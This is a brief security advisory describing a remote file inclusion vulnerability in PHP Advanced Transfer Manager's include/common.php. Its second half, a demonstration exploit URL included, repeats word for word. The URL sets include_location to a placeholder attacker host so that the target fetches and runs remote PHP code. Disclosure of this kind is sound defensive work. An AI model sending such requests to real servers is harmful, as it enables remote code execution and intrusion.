Hole in Advanced Transfer Manager
An include file vulnerability was reported in PHP Advanced Transfer Manager. A remote user can execute arbitrary commands on the target system.
If allow_url_fopen is set to 'on' in the 'php.ini' configuration file, the 'include/common.php' script allows a remote user to overwrite the 'include_location' parameter.
A remote user can supply a specially crafted URL to cause arbitrary PHP code to be included and executed by the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/index.php?include_location=http://[attacker]/
If allow_url_fopen is set to 'on' in the 'php.ini' configuration file, the 'include/common.php' script allows a remote user to overwrite the 'include_location' parameter.
A remote user can supply a specially crafted URL to cause arbitrary PHP code to be included and executed by the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/index.php?include_location=http://[attacker]/
